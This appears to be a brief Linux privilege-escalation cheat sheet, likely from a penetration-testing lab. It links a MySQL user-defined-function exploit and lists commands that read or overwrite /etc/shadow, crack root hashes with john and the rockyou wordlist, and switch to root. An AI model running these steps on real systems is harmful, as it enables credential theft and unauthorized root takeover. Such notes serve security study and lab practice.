Service Exploits
----------------
MySQL User Defined Functions
https://www.exploit-db.com/exploits/1518

Weak File Permissions - Readable /etc/shadow
--------------------------------------------
ls -l /etc/shadow
cat /etc/shadow
john --wordlist=/usr/share/wordlists/rockyou.txt password_hash.txt
su root

Weak File Permissions - Writable /etc/shadow
---------------------------------------------
ls -l /etc/shadow
mkpasswd -m sha-512 <newpasswordhere>
Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated. (Between the first and second :)
su root


